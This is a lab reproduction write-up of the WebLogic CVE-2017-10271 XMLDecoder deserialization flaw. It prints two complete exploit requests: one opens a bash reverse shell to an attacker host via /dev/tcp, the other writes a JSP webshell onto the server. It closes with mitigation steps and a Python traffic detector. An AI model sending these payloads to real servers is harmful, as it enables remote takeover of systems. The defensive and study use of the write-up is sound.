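Weblogic XMLDecoder Deserialization Vulnerability (CVE-2017-10271): Detection and Exploitation Reproduction
阿新 • • Published: 2018-12-09
WebLogic's WLS Security component exposes a web service that uses XMLDecoder to parse user-supplied XML. A deserialization vulnerability occurs during that parsing and allows arbitrary command execution.
Setting up the vulnerable environment
See: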
https://blog.csdn.net/qq_29647709/article/details/84892582
Vulnerability detection
Download the detection tool:
https://pan.baidu.com/s/1bpg3ppl
Exploitation
Reverse shell
poc:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.1.15:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 637

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>bash -i >& /dev/tcp/192.168.1.31/4444 0>&1</string>
            </void>
          </array>
          <void method="start"/></void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
First, listen on port 4444 on the Kali host 192.168.1.31.
Send the PoC with Burp Suite:
Back on Kali, the reverse shell has been received:
Writing a shell
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.1.15:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java><java version="1.4.0" class="java.beans.XMLDecoder">
        <object class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
          <void method="println"><string>
            <![CDATA[
            <% out.print("test"); %>
            ]]>
          </string>
          </void>
          <void method="close"/>
        </object></java></java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
Build and send the request with Burp:
Access the shell
http://192.168.1.15:7001/bea_wls_internal/test.jsp
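Mitigation
1. Temporary workaround: depending on business requirements, consider removing the WLS-WebServices component. The paths containing this component are:
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
Middleware/wlserver_10.3/server/lib/wls-wsat.war
All of the above paths are under the WebLogic installation directory. After deleting these files, WebLogic must be restarted. Confirm that http://weblogic_ip/wls-wsat/ returns a 404 page.
2. Official patch: go to the Oracle website and download the security patch provided in October.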
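Until the component is removed or patched, requests like the two shown above can be flagged in captured traffic or proxy logs. The following is an added example, not code from the original post or from Oracle: it reports POSTs to /wls-wsat/ whose WorkContext SOAP header carries XMLDecoder elements. The function name, the host name and the sample requests are constructed for illustration.

```python
import re

# Any endpoint served by wls-wsat.war; the PoC above uses CoordinatorPortType.
WSAT_PATH = re.compile(r"/wls-wsat/", re.I)
# SOAP header block handed to XMLDecoder; \Z tolerates a truncated capture.
WORK_CONTEXT = re.compile(
    r"<(?:\w+:)?WorkContext\b.*?(?:</(?:\w+:)?WorkContext>|\Z)", re.S | re.I)
# XMLDecoder elements that create objects or invoke methods.
DECODER_TAG = re.compile(r"<\s*(java|object|new|void|method|array)\b([^>]*)>", re.I)
CLASS_ATTR = re.compile(r"""\bclass\s*=\s*["']([^"']+)["']""", re.I)


def inspect_request(raw):
    """Return [(tag, class_or_None), ...] for one raw HTTP request string."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2 or request_line[0].upper() != "POST":
        return []
    if not WSAT_PATH.search(request_line[1]):
        return []
    findings = []
    for ctx in WORK_CONTEXT.finditer(body):
        for tag, attrs in DECODER_TAG.findall(ctx.group(0)):
            cls = CLASS_ATTR.search(attrs)
            findings.append((tag.lower(), cls.group(1) if cls else None))
    return findings


# Constructed samples (not captured traffic); command arguments are omitted.
_HEAD = "POST {} HTTP/1.1\r\nHost: weblogic.example:7001\r\nContent-Type: text/xml\r\n\r\n"
_BODY = (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
    '<java version="1.4.0" class="java.beans.XMLDecoder">'
    '<void class="java.lang.ProcessBuilder"><void method="start"/></void>'
    "</java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>"
)
SUSPICIOUS = _HEAD.format("/wls-wsat/CoordinatorPortType") + _BODY
OTHER_PATH = _HEAD.format("/app/service") + _BODY
TRUNCATED = SUSPICIOUS[: SUSPICIOUS.index("<void method")]

if __name__ == "__main__":
    for name, req in [("suspicious", SUSPICIOUS), ("other path", OTHER_PATH),
                      ("truncated", TRUNCATED)]:
        print(name, inspect_request(req))
```

Regular expressions are used instead of an XML parser because such request bodies are not always well-formed XML. On a server that does not use WS-AT, any non-empty result is worth investigating.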
References:
https://paper.seebug.org/487/
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic WLS-WebServices元件反序列化漏洞分析.md